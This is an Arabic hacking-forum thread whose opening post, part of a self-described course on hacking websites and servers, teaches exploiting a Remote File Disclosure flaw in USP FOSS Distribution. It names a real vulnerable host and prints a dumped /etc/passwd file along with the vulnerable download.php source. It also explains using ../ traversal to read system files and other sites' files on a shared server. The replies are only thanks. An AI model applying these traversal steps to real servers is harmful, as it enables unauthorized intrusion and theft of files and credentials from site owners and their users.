اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

شرح استغلال ثغرات Remote File Disclosure

شرح استغلال ثغرات Remote File Disclosure


النتائج 1 إلى 10 من 10

الموضوع: شرح استغلال ثغرات Remote File Disclosure

  1. #1
    :: إدارة :: Aljyyosh Team Array الصورة الرمزية ASDELY-ScOrPiOn
    تاريخ التسجيل
    Jun 2009
    الدولة
    فلسطين
    المشاركات
    2,706

    Hasri شرح استغلال ثغرات Remote File Disclosure



    السلام عليكم و رحمة الله وبركاته


    --==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==--
    الدورة التعليمية لاختراق المواقع و السيرفرات مقدمة من طرف
    ASDELY & SCORPION
    --==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==--
    --==/=/=/=/=/=/=========================================/=/=/=/=/=/==--
    شرح استغلال ثغرات Remote File Disclosure
    --==/=/=/=/=/=/=========================================/=/=/=/=/=/==--
    تفيدنا ثغرات Remote File Disclosure في قراءة ملفات حق سرفر الموقع , وبذلك ممكن قراءة ملفات مهمة تفيدنا في الاختراق مثل ملفات /etc/ (passwd , valiases..) كما بامكاننا
    قراءة ملفات اي موقع بالسرفر لكن مع احترام مكانه في السرفر .
    اولا سوف نشرح على ثغرة في سكربت USP FOSS Distribution , رابط الثغرة : http://www.milw0rm.com/exploits/3794
    اوكي سوف امر الى التطبيق مباشرة لان تم شرح كيفية التعامل مع ثغرات الملورم في دروس سابقة
    >>
    ################################################## #################################
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    ................
    ################################################## #################################


    كما لاحضتم تم قراءة محتوى ملف /etc/passwd
    ملاحضة هامة : لقراءة ملف ما وارد بالموقع اللي مصاب بالثغرة (riemann.usp.ac.fj/~uspfoss/ في مثالنا الحالي) يكفي التلاعب بهذه العلامة التي تدل على خطوة الى الوراء : ../
    مثلا نعلم ان الملف download.php وارد عالموقع واريد رأية السرس كود حقه :
    >>
    ################################################## #################################
    <?php
    // <!--sphider_noindex-->
    $file = @$_GET['dnld'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/force-download');
    header('Content-Length: ' . filesize($file));
    header('Content-Disposition: attachment; filename=' . basename($file));
    readfile($file);
    // <!--/sphider_noindex-->
    ?>
    ################################################## #################################
    >>
    ملاحضة : لو اردنا قراءة ملف حق موقع اخر بالسرفر يكفي التلاعب بهذه العلامات ../../../../../../ لكن مع احترام المسار اللي حصلنا عليها عند قراءة ملف /etc/passwd
    انتهى الشرح



  2. #2
    هكر مبتديء Array
    تاريخ التسجيل
    Jul 2009
    المشاركات
    3

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    يعطيك الف عافيه على الشرررررح


  3. #3
    :: مشرف عام :: Aljyyosh Team Array الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure




  4. #4
    هكر مبتديء Array
    تاريخ التسجيل
    Sep 2009
    المشاركات
    20

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    مشكور كتير على الشرح الجيد



    تحياتي لك


  5. #5
    هكر مجتهد Array
    تاريخ التسجيل
    Oct 2009
    الدولة
    مسوي معسكر في منتدى جيوش الهكرز
    المشاركات
    273

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    يعطيك آلف عافيه يالغلا
    تقبل مروري المتوآضع


    ،


  6. #6
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2009
    الدولة
    الجزائر قلبي وغزة نبضه
    المشاركات
    17

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    الشرح صعب قليلا



  7. #7
    هكر نشيط Array الصورة الرمزية جندي اول للهكر
    تاريخ التسجيل
    Aug 2009
    الدولة
    البلاد المظلمه >الجيوش<
    المشاركات
    108

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    والله كبير والله والله والله كبير والله


  8. #8
    هكر مبتديء Array
    تاريخ التسجيل
    May 2010
    المشاركات
    10

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    مشكور كتير على الشرح الجيد


  9. #9
    هكر مجتهد Array الصورة الرمزية رمز الهكر
    تاريخ التسجيل
    Mar 2011
    الدولة
    الســــــــــــــعوديـــــــــــــــــــــــة
    المشاركات
    258

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    مشكور يا غالي كفيت وفيت



  10. #10
    هكر نشيط Array الصورة الرمزية هكر الديوانيه
    تاريخ التسجيل
    May 2011
    الدولة
    العراق
    المشاركات
    116

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    مشكور ع الجهد البذول منك يا اخي الكريم


المواضيع المتشابهه

  1. شرح استغلال ثغرات remote file include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 89
    آخر مشاركة: 05-11-2012, 05:32 PM
  2. كيفيه اكتشاف ثغرات Remote File Inclusion
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 43
    آخر مشاركة: 03-16-2012, 10:16 PM
  3. كيفيه اكتشاف ثغرات Remote File Disclosure
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 24
    آخر مشاركة: 03-16-2012, 10:07 PM
  4. استغلال ثغرات file upload
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 68
    آخر مشاركة: 09-18-2011, 08:13 PM
  5. شرح استغلال ثغرات remote file disclousure
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 22
    آخر مشاركة: 08-31-2011, 08:25 AM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرة remote file disclosure

remote exploits شرح

شرح ثغرة remote file uploadشرح استخدم تغرتRemote Exploitsشرح التعامل مع تغرات من نوع ريموت فايلRemote Exploits ] ثغرات remote file disclosureiﺛﻐﺮﺓ Remote File Disclosureاستغلا ثغرات ابلودetcpasswd ثغرة استغلالشرح قرائه ثغرات شرح Remote File Disclosureكيفية استغلال ثغرة remote file disclosuredisclosure شرحتعليم اختراق Remote Exploitsشرح ثغرة file disclosureشرح ثغرة remote file disclosureشرح قرات اثغراتwww.aljyyosh.com showthreadشرح disclosure ثغرةاختراق بثغرة file uploaderشرح استغلال ثغرات remote file disclousureشرح استغلال baguniشرح موقع Remote exploitwhat is remote file disclosure

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •